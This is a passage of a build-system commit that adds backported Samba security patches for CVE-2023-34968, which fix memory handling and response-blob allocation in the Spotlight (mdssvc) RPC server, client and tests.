entry->path = talloc_strdup(entry, path); + if (entry->path == NULL) { + DEBUG(1, ("talloc failed\n")); +@@ -629,7 +633,7 @@ bool mds_add_result(struct sl_query *slq, const char *path) + return false; + } + +- ok = inode_map_add(slq, ino64, path); ++ ok = inode_map_add(slq, ino64, path, &sb); + if (!ok) { + DEBUG(1, ("inode_map_add error\n")); + slq->state = SLQ_STATE_ERROR; +@@ -1350,29 +1354,7 @@ static bool slrpc_fetch_attributes(struct mds_ctx *mds_ctx, + elem = talloc_get_type_abort(p, struct sl_inode_path_map); + path = elem->path; + +- status = synthetic_pathref(talloc_tos(), +- mds_ctx->conn->cwd_fsp, +- path, +- NULL, +- NULL, +- 0, +- 0, +- &smb_fname); +- if (!NT_STATUS_IS_OK(status)) { +- /* This is not an error, the user may lack permissions */ +- DBG_DEBUG("synthetic_pathref [%s]: %s\n", +- smb_fname_str_dbg(smb_fname), +- nt_errstr(status)); +- return true; +- } +- +- result = SMB_VFS_FSTAT(smb_fname->fsp, &smb_fname->st); +- if (result != 0) { +- TALLOC_FREE(smb_fname); +- return true; +- } +- +- sp = &smb_fname->st; ++ sp = &elem->st; + } + + ok = add_filemeta(mds_ctx, reqinfo, fm_array, path, sp); +diff --git a/source3/rpc_server/mdssvc/mdssvc.h b/source3/rpc_server/mdssvc/mdssvc.h +index 3924827..a097991 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.h ++++ b/source3/rpc_server/mdssvc/mdssvc.h +@@ -105,6 +105,7 @@ struct sl_inode_path_map { + struct mds_ctx *mds_ctx; + uint64_t ino; + char *path; ++ struct stat_ex st; + }; + + /* Per process state */ +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0002.patch new file mode 100644 index 0000000000..21b98c4d7e --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0002.patch @@ -0,0 +1,39 @@ +From 47a0c1681dd1e7ec407679793966ec8bdc08a24e Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Sat, 17 Jun 2023 13:39:55 +0200 +Subject: [PATCH] CVE-2023-34968: mdssvc: add missing "kMDSStoreMetaScopes" + dict key in slrpc_fetch_properties() + +We were adding the value, but not the key. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/47a0c1681dd1e7ec407679793966ec8bdc08a24e] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_server/mdssvc/mdssvc.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c +index a6d09a43b9c..9c23ef95753 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.c ++++ b/source3/rpc_server/mdssvc/mdssvc.c +@@ -730,6 +730,10 @@ static bool slrpc_fetch_properties(struct mds_ctx *mds_ctx, + } + + /* kMDSStoreMetaScopes array */ ++ result = dalloc_stradd(dict, "kMDSStoreMetaScopes"); ++ if (result != 0) { ++ return false; ++ } + array = dalloc_zero(dict, sl_array_t); + if (array == NULL) { + return NULL; +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0003.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0003.patch new file mode 100644 index 0000000000..42106d82b8 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0003.patch @@ -0,0 +1,65 @@ +From 56a21b3bc8fb24416ead9061f9305c8122bc7f86 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Mon, 19 Jun 2023 17:14:38 +0200 +Subject: [PATCH] CVE-2023-34968: mdscli: use correct TALLOC memory context + when allocating spotlight_blob + +d is talloc_free()d at the end of the functions and the buffer was later used +after beeing freed in the DCERPC layer when sending the packet. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/56a21b3bc8fb24416ead9061f9305c8122bc7f86] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_client/cli_mdssvc_util.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/source3/rpc_client/cli_mdssvc_util.c b/source3/rpc_client/cli_mdssvc_util.c +index fe5092c3790..892a844e71a 100644 +--- a/source3/rpc_client/cli_mdssvc_util.c ++++ b/source3/rpc_client/cli_mdssvc_util.c +@@ -209,7 +209,7 @@ NTSTATUS mdscli_blob_search(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(d, ++ blob->spotlight_blob = talloc_array(mem_ctx, + uint8_t, + ctx->max_fragment_size); + if (blob->spotlight_blob == NULL) { +@@ -293,7 +293,7 @@ NTSTATUS mdscli_blob_get_results(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(d, ++ blob->spotlight_blob = talloc_array(mem_ctx, + uint8_t, + ctx->max_fragment_size); + if (blob->spotlight_blob == NULL) { +@@ -426,7 +426,7 @@ NTSTATUS mdscli_blob_get_path(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(d, ++ blob->spotlight_blob = talloc_array(mem_ctx, + uint8_t, + ctx->max_fragment_size); + if (blob->spotlight_blob == NULL) { +@@ -510,7 +510,7 @@ NTSTATUS mdscli_blob_close_search(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(d, ++ blob->spotlight_blob = talloc_array(mem_ctx, + uint8_t, + ctx->max_fragment_size); + if (blob->spotlight_blob == NULL) { +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0004.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0004.patch new file mode 100644 index 0000000000..785908b528 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0004.patch @@ -0,0 +1,85 @@ +From 0ae6084d1a9c4eb12e9f1ab1902e00f96bcbea55 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Mon, 19 Jun 2023 18:28:41 +0200 +Subject: [PATCH] CVE-2023-34968: mdscli: remove response blob allocation + +This is handled by the NDR code transparently. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> +--- + source3/rpc_client/cli_mdssvc.c | 36 --------------------------------- + 1 file changed, 36 deletions(-) + +diff --git a/source3/rpc_client/cli_mdssvc.c b/source3/rpc_client/cli_mdssvc.c +index 046d37135cb..474d7c0b150 100644 +--- a/source3/rpc_client/cli_mdssvc.c ++++ b/source3/rpc_client/cli_mdssvc.c +@@ -276,15 +276,6 @@ struct tevent_req *mdscli_search_send(TALLOC_CTX *mem_ctx, + return tevent_req_post(req, ev); + } + +- state->response_blob.spotlight_blob = talloc_array( +- state, +- uint8_t, +- mdscli_ctx->max_fragment_size); +- if (tevent_req_nomem(state->response_blob.spotlight_blob, req)) { +- return tevent_req_post(req, ev); +- } +- state->response_blob.size = mdscli_ctx->max_fragment_size; +- + subreq = dcerpc_mdssvc_cmd_send(state, + ev, + mdscli_ctx->bh, +@@ -457,15 +448,6 @@ struct tevent_req *mdscli_get_results_send( + return tevent_req_post(req, ev); + } + +- state->response_blob.spotlight_blob = talloc_array( +- state, +- uint8_t, +- mdscli_ctx->max_fragment_size); +- if (tevent_req_nomem(state->response_blob.spotlight_blob, req)) { +- return tevent_req_post(req, ev); +- } +- state->response_blob.size = mdscli_ctx->max_fragment_size; +- + subreq = dcerpc_mdssvc_cmd_send(state, + ev, + mdscli_ctx->bh, +@@ -681,15 +663,6 @@ struct tevent_req *mdscli_get_path_send(TALLOC_CTX *mem_ctx, + return tevent_req_post(req, ev); + } + +- state->response_blob.spotlight_blob = talloc_array( +- state, +- uint8_t, +- mdscli_ctx->max_fragment_size); +- if (tevent_req_nomem(state->response_blob.spotlight_blob, req)) { +- return tevent_req_post(req, ev); +- } +- state->response_blob.size = mdscli_ctx->max_fragment_size; +- + subreq = dcerpc_mdssvc_cmd_send(state, + ev, + mdscli_ctx->bh, +@@ -852,15 +825,6 @@ struct tevent_req *mdscli_close_search_send(TALLOC_CTX *mem_ctx, + return tevent_req_post(req, ev); + } + +- state->response_blob.spotlight_blob = talloc_array( +- state, +- uint8_t, +- mdscli_ctx->max_fragment_size); +- if (tevent_req_nomem(state->response_blob.spotlight_blob, req)) { +- return tevent_req_post(req, ev); +- } +- state->response_blob.size = mdscli_ctx->max_fragment_size; +- + subreq = dcerpc_mdssvc_cmd_send(state, + ev, + mdscli_ctx->bh, +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0005.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0005.patch new file mode 100644 index 0000000000..308b441e95 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0005.patch @@ -0,0 +1,83 @@ +From 353a9ccea6ff93ea2cd604dcc2b0372f056f819d Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Tue, 20 Jun 2023 11:28:47 +0200 +Subject: [PATCH] CVE-2023-34968: smbtorture: remove response blob allocation + in mdssvc.c + +This is alreay done by NDR for us. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/353a9ccea6ff93ea2cd604dcc2b0372f056f819d] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> + +--- + source4/torture/rpc/mdssvc.c | 26 -------------------------- + 1 file changed, 26 deletions(-) + +diff --git a/source4/torture/rpc/mdssvc.c b/source4/torture/rpc/mdssvc.c +index 3689692f7de..a16bd5b47e3 100644 +--- a/source4/torture/rpc/mdssvc.c ++++ b/source4/torture/rpc/mdssvc.c +@@ -536,13 +536,6 @@ static bool test_mdssvc_invalid_ph_cmd(struct torture_context *tctx, + request_blob.length = 0; + request_blob.size = 0; + +- response_blob.spotlight_blob = talloc_array(state, +- uint8_t, +- 0); +- torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, +- ok, done, "dalloc_zero failed\n"); +- response_blob.size = 0; +- + status = dcerpc_mdssvc_cmd(b, + state, + &ph, +@@ -632,13 +625,6 @@ static bool test_mdssvc_sl_unpack_loop(struct torture_context *tctx, + request_blob.size = sizeof(test_sl_unpack_loop_buf); + request_blob.length = sizeof(test_sl_unpack_loop_buf); + +- response_blob.spotlight_blob = talloc_array(state, +- uint8_t, +- 0); +- torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, +- ok, done, "dalloc_zero failed\n"); +- response_blob.size = 0; +- + status = dcerpc_mdssvc_cmd(b, + state, + &state->ph, +@@ -764,11 +750,6 @@ static bool test_sl_dict_type_safety(struct torture_context *tctx, + torture_assert_goto(tctx, request_blob.length > 0, + ok, done, "sl_pack failed\n"); + +- response_blob.spotlight_blob = talloc_array(state, uint8_t, 0); +- torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, +- ok, done, "dalloc_zero failed\n"); +- response_blob.size = 0; +- + status = dcerpc_mdssvc_cmd(b, + state, + &state->ph, +@@ -926,13 +907,6 @@ static bool test_mdssvc_fetch_attr_unknown_cnid(struct torture_context *tctx, + ret, done, "dalloc_zero failed\n"); + request_blob.size = max_fragment_size; + +- response_blob.spotlight_blob = talloc_array(state, +- uint8_t, +- max_fragment_size); +- torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, +- ret, done, "dalloc_zero failed\n"); +- response_blob.size = max_fragment_size; +- + len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size); + torture_assert_goto(tctx, len != -1, ret, done, "sl_pack failed\n"); + +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0006.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0006.patch new file mode 100644 index 0000000000..34526a8c8e --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0006.patch @@ -0,0 +1,57 @@ +From 449f1280b718c6da3b8e309fe124be4e9bfd8184 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Tue, 20 Jun 2023 11:35:41 +0200 +Subject: [PATCH] CVE-2023-34968: rpcclient: remove response blob allocation + +This is alreay done by NDR for us. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/449f1280b718c6da3b8e309fe124be4e9bfd8184] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpcclient/cmd_spotlight.c | 16 ---------------- + 1 file changed, 16 deletions(-) + +diff --git a/source3/rpcclient/cmd_spotlight.c b/source3/rpcclient/cmd_spotlight.c +index 24db9893df6..64fe321089c 100644 +--- a/source3/rpcclient/cmd_spotlight.c ++++ b/source3/rpcclient/cmd_spotlight.c +@@ -144,13 +144,6 @@ static NTSTATUS cmd_mdssvc_fetch_properties( + } + request_blob.size = max_fragment_size; + +- response_blob.spotlight_blob = talloc_array(mem_ctx, uint8_t, max_fragment_size); +- if (response_blob.spotlight_blob == NULL) { +- status = NT_STATUS_INTERNAL_ERROR; +- goto done; +- } +- response_blob.size = max_fragment_size; +- + len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size); + if (len == -1) { + status = NT_STATUS_INTERNAL_ERROR; +@@ -368,15 +361,6 @@ static NTSTATUS cmd_mdssvc_fetch_attributes( + } + request_blob.size = max_fragment_size; + +- response_blob.spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- max_fragment_size); +- if (response_blob.spotlight_blob == NULL) { +- status = NT_STATUS_INTERNAL_ERROR; +- goto done; +- } +- response_blob.size = max_fragment_size; +- + len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size); + if (len == -1) { + status = NT_STATUS_INTERNAL_ERROR; +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0007.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0007.patch new file mode 100644 index 0000000000..679e174c05 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0007.patch @@ -0,0 +1,49 @@ +From cc593a6ac531f02f2fe70fd4f7dfe649a02f9206 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Tue, 20 Jun 2023 11:42:10 +0200 +Subject: [PATCH] CVE-2023-34968: mdssvc: remove response blob allocation + +This is alreay done by NDR for us. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/cc593a6ac531f02f2fe70fd4f7dfe649a02f9206] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_server/mdssvc/srv_mdssvc_nt.c | 8 -------- + 1 file changed, 8 deletions(-) + +diff --git a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c +index b8eed8b..714e6c1 100644 +--- a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c ++++ b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c +@@ -209,7 +209,6 @@ void _mdssvc_unknown1(struct pipes_struct *p, struct mdssvc_unknown1 *r) + void _mdssvc_cmd(struct pipes_struct *p, struct mdssvc_cmd *r) + { + bool ok; +- char *rbuf; + struct mds_ctx *mds_ctx; + NTSTATUS status; + +@@ -266,13 +265,6 @@ void _mdssvc_cmd(struct pipes_struct *p, struct mdssvc_cmd *r) + return; + } + +- rbuf = talloc_zero_array(p->mem_ctx, char, r->in.max_fragment_size1); +- if (rbuf == NULL) { +- p->fault_state = DCERPC_FAULT_CANT_PERFORM; +- return; +- } +- r->out.response_blob->spotlight_blob = (uint8_t *)rbuf; +- r->out.response_blob->size = r->in.max_fragment_size1; + + /* We currently don't use fragmentation at the mdssvc RPC layer */ + *r->out.fragment = 0; +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0008.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0008.patch new file mode 100644 index 0000000000..e65379fe83 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0008.patch @@ -0,0 +1,62 @@ +From 397919e82b493206ae9b60bb9c539d52c3207729 Mon Sep 17 00:00:00 2001 +From: Archana Polampalli <archana.polampalli@windriver.com> +Date: Fri, 29 Sep 2023 08:59:31 +0000 +Subject: [PATCH] CVE-2023-34968: mdssvc: switch to doing an early return + +Just reduce indentation of the code handling the success case. No change in +behaviour. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/397919e82b493206ae9b60bb9c539d52c3207729] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_server/mdssvc/mdssvc.c | 26 ++++++++++++++------------ + 1 file changed, 14 insertions(+), 12 deletions(-) + +diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c +index a6cc653..0e6a916 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.c ++++ b/source3/rpc_server/mdssvc/mdssvc.c +@@ -1798,19 +1798,21 @@ bool mds_dispatch(struct mds_ctx *mds_ctx, + } + + ok = slcmd->function(mds_ctx, query, reply); +- if (ok) { +- DBG_DEBUG("%s", dalloc_dump(reply, 0)); +- +- len = sl_pack(reply, +- (char *)response_blob->spotlight_blob, +- response_blob->size); +- if (len == -1) { +- DBG_ERR("error packing Spotlight RPC reply\n"); +- ok = false; +- goto cleanup; +- } +- response_blob->length = len; ++ if (!ok) { ++ goto cleanup; ++ } ++ ++ DBG_DEBUG("%s", dalloc_dump(reply, 0)); ++ ++ len = sl_pack(reply, ++ (char *)response_blob->spotlight_blob, ++ response_blob->size); ++ if (len == -1) { ++ DBG_ERR("error packing Spotlight RPC reply\n"); ++ ok = false; ++ goto cleanup; + } ++ response_blob->length = len; + + cleanup: + talloc_free(query); +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0009.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0009.patch new file mode 100644 index 0000000000..e21f2ba4be --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0009.patch @@ -0,0 +1,465 @@ +From cb8313e7bee75454ce29d2b2f657927259298f52 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Mon, 19 Jun 2023 18:16:57 +0200 +Subject: [PATCH] CVE-2023-34968: mdssvc: introduce an allocating wrapper to + sl_pack() + +sl_pack_alloc() does the buffer allocation that previously all callers of +sl_pack() did themselves. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/cb8313e7bee75454ce29d2b2f657927259298f52] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_client/cli_mdssvc_util.c | 80 +++++------------------ + source3/rpc_server/mdssvc/marshalling.c | 35 ++++++++-- + source3/rpc_server/mdssvc/marshalling.h | 9 ++- + source3/rpc_server/mdssvc/mdssvc.c | 18 ++--- + source3/rpc_server/mdssvc/mdssvc.h | 5 +- + source3/rpc_server/mdssvc/srv_mdssvc_nt.c | 5 +- + source3/rpcclient/cmd_spotlight.c | 32 ++------- + source4/torture/rpc/mdssvc.c | 24 ++----- + 8 files changed, 80 insertions(+), 128 deletions(-) + +diff --git a/source3/rpc_client/cli_mdssvc_util.c b/source3/rpc_client/cli_mdssvc_util.c +index 892a844..a39202d 100644 +--- a/source3/rpc_client/cli_mdssvc_util.c ++++ b/source3/rpc_client/cli_mdssvc_util.c +@@ -42,7 +42,7 @@ NTSTATUS mdscli_blob_search(TALLOC_CTX *mem_ctx, + sl_array_t *scope_array = NULL; + double dval; + uint64_t uint64val; +- ssize_t len; ++ NTSTATUS status; + int ret; + + d = dalloc_new(mem_ctx); +@@ -209,23 +209,11 @@ NTSTATUS mdscli_blob_search(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- ctx->max_fragment_size); +- if (blob->spotlight_blob == NULL) { +- TALLOC_FREE(d); +- return NT_STATUS_NO_MEMORY; +- } +- blob->size = ctx->max_fragment_size; +- +- len = sl_pack(d, (char *)blob->spotlight_blob, blob->size); ++ status = sl_pack_alloc(mem_ctx, d, blob, ctx->max_fragment_size); + TALLOC_FREE(d); +- if (len == -1) { +- return NT_STATUS_NO_MEMORY; ++ if (!NT_STATUS_IS_OK(status)) { ++ return status; + } +- +- blob->length = len; +- blob->size = len; + return NT_STATUS_OK; + } + +@@ -238,7 +226,7 @@ NTSTATUS mdscli_blob_get_results(TALLOC_CTX *mem_ctx, + uint64_t *uint64p = NULL; + sl_array_t *array = NULL; + sl_array_t *cmd_array = NULL; +- ssize_t len; ++ NTSTATUS status; + int ret; + + d = dalloc_new(mem_ctx); +@@ -293,23 +281,11 @@ NTSTATUS mdscli_blob_get_results(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- ctx->max_fragment_size); +- if (blob->spotlight_blob == NULL) { +- TALLOC_FREE(d); +- return NT_STATUS_NO_MEMORY; +- } +- blob->size = ctx->max_fragment_size; +- +- len = sl_pack(d, (char *)blob->spotlight_blob, blob->size); ++ status = sl_pack_alloc(mem_ctx, d, blob, ctx->max_fragment_size); + TALLOC_FREE(d); +- if (len == -1) { +- return NT_STATUS_NO_MEMORY; ++ if (!NT_STATUS_IS_OK(status)) { ++ return status; + } +- +- blob->length = len; +- blob->size = len; + return NT_STATUS_OK; + } + +@@ -325,7 +301,7 @@ NTSTATUS mdscli_blob_get_path(TALLOC_CTX *mem_ctx, + sl_array_t *cmd_array = NULL; + sl_array_t *attr_array = NULL; + sl_cnids_t *cnids = NULL; +- ssize_t len; ++ NTSTATUS status; + int ret; + + d = dalloc_new(mem_ctx); +@@ -426,23 +402,11 @@ NTSTATUS mdscli_blob_get_path(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- ctx->max_fragment_size); +- if (blob->spotlight_blob == NULL) { +- TALLOC_FREE(d); +- return NT_STATUS_NO_MEMORY; +- } +- blob->size = ctx->max_fragment_size; +- +- len = sl_pack(d, (char *)blob->spotlight_blob, blob->size); ++ status = sl_pack_alloc(mem_ctx, d, blob, ctx->max_fragment_size); + TALLOC_FREE(d); +- if (len == -1) { +- return NT_STATUS_NO_MEMORY; ++ if (!NT_STATUS_IS_OK(status)) { ++ return status; + } +- +- blob->length = len; +- blob->size = len; + return NT_STATUS_OK; + } + +@@ -455,7 +419,7 @@ NTSTATUS mdscli_blob_close_search(TALLOC_CTX *mem_ctx, + uint64_t *uint64p = NULL; + sl_array_t *array = NULL; + sl_array_t *cmd_array = NULL; +- ssize_t len; ++ NTSTATUS status; + int ret; + + d = dalloc_new(mem_ctx); +@@ -510,22 +474,10 @@ NTSTATUS mdscli_blob_close_search(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- ctx->max_fragment_size); +- if (blob->spotlight_blob == NULL) { +- TALLOC_FREE(d); +- return NT_STATUS_NO_MEMORY; +- } +- blob->size = ctx->max_fragment_size; +- +- len = sl_pack(d, (char *)blob->spotlight_blob, blob->size); ++ status = sl_pack_alloc(mem_ctx, d, blob, ctx->max_fragment_size); + TALLOC_FREE(d); +- if (len == -1) { +- return NT_STATUS_NO_MEMORY; ++ if (!NT_STATUS_IS_OK(status)) { ++ return status; + } +- +- blob->length = len; +- blob->size = len; + return NT_STATUS_OK; + } +diff --git a/source3/rpc_server/mdssvc/marshalling.c b/source3/rpc_server/mdssvc/marshalling.c +index 441d411..34bfda5 100644 +--- a/source3/rpc_server/mdssvc/marshalling.c ++++ b/source3/rpc_server/mdssvc/marshalling.c +@@ -78,6 +78,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, const char *buf, + ssize_t offset, size_t bufsize, + int count, ssize_t toc_offset, + int encoding); ++static ssize_t sl_pack(DALLOC_CTX *query, char *buf, size_t bufsize); + + /****************************************************************************** + * Wrapper functions for the *VAL macros with bound checking +@@ -1190,11 +1191,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + return offset; + } + +-/****************************************************************************** +- * Global functions for packing und unpacking +- ******************************************************************************/ +- +-ssize_t sl_pack(DALLOC_CTX *query, char *buf, size_t bufsize) ++static ssize_t sl_pack(DALLOC_CTX *query, char *buf, size_t bufsize) + { + ssize_t result; + char *toc_buf; +@@ -1274,6 +1271,34 @@ ssize_t sl_pack(DALLOC_CTX *query, char *buf, size_t bufsize) + return len; + } + ++/****************************************************************************** ++ * Global functions for packing und unpacking ++ ******************************************************************************/ ++ ++NTSTATUS sl_pack_alloc(TALLOC_CTX *mem_ctx, ++ DALLOC_CTX *d, ++ struct mdssvc_blob *b, ++ size_t max_fragment_size) ++{ ++ ssize_t len; ++ ++ b->spotlight_blob = talloc_zero_array(mem_ctx, ++ uint8_t, ++ max_fragment_size); ++ if (b->spotlight_blob == NULL) { ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ len = sl_pack(d, (char *)b->spotlight_blob, max_fragment_size); ++ if (len == -1) { ++ return NT_STATUS_DATA_ERROR; ++ } ++ ++ b->length = len; ++ b->size = len; ++ return NT_STATUS_OK; ++} ++ + bool sl_unpack(DALLOC_CTX *query, const char *buf, size_t bufsize) + { + ssize_t result; +diff --git a/source3/rpc_server/mdssvc/marshalling.h b/source3/rpc_server/mdssvc/marshalling.h +index 086ca74..2cc1b44 100644 +--- a/source3/rpc_server/mdssvc/marshalling.h ++++ b/source3/rpc_server/mdssvc/marshalling.h +@@ -22,6 +22,9 @@ + #define _MDSSVC_MARSHALLING_H + + #include "dalloc.h" ++#include "libcli/util/ntstatus.h" ++#include "lib/util/data_blob.h" ++#include "librpc/gen_ndr/mdssvc.h" + + #define MAX_SL_FRAGMENT_SIZE 0xFFFFF + +@@ -49,7 +52,11 @@ typedef struct { + * Function declarations + ******************************************************************************/ + +-extern ssize_t sl_pack(DALLOC_CTX *query, char *buf, size_t bufsize); ++extern NTSTATUS sl_pack_alloc(TALLOC_CTX *mem_ctx, ++ DALLOC_CTX *d, ++ struct mdssvc_blob *b, ++ size_t max_fragment_size); ++ + extern bool sl_unpack(DALLOC_CTX *query, const char *buf, size_t bufsize); + + #endif +diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c +index 0e6a916..19257e8 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.c ++++ b/source3/rpc_server/mdssvc/mdssvc.c +@@ -1726,11 +1726,11 @@ error: + **/ + bool mds_dispatch(struct mds_ctx *mds_ctx, + struct mdssvc_blob *request_blob, +- struct mdssvc_blob *response_blob) ++ struct mdssvc_blob *response_blob, ++ size_t max_fragment_size) + { + bool ok; + int ret; +- ssize_t len; + DALLOC_CTX *query = NULL; + DALLOC_CTX *reply = NULL; + char *rpccmd; +@@ -1738,6 +1738,7 @@ bool mds_dispatch(struct mds_ctx *mds_ctx, + const struct smb_filename conn_basedir = { + .base_name = mds_ctx->conn->connectpath, + }; ++ NTSTATUS status; + + if (CHECK_DEBUGLVL(10)) { + const struct sl_query *slq; +@@ -1804,15 +1805,14 @@ bool mds_dispatch(struct mds_ctx *mds_ctx, + + DBG_DEBUG("%s", dalloc_dump(reply, 0)); + +- len = sl_pack(reply, +- (char *)response_blob->spotlight_blob, +- response_blob->size); +- if (len == -1) { +- DBG_ERR("error packing Spotlight RPC reply\n"); +- ok = false; ++ status = sl_pack_alloc(response_blob, ++ reply, ++ response_blob, ++ max_fragment_size); ++ if (!NT_STATUS_IS_OK(status)) { ++ DBG_ERR("sl_pack_alloc() failed\n"); + goto cleanup; + } +- response_blob->length = len; + + cleanup: + talloc_free(query); +diff --git a/source3/rpc_server/mdssvc/mdssvc.h b/source3/rpc_server/mdssvc/mdssvc.h +index a097991..b3bd8b9 100644 +--- 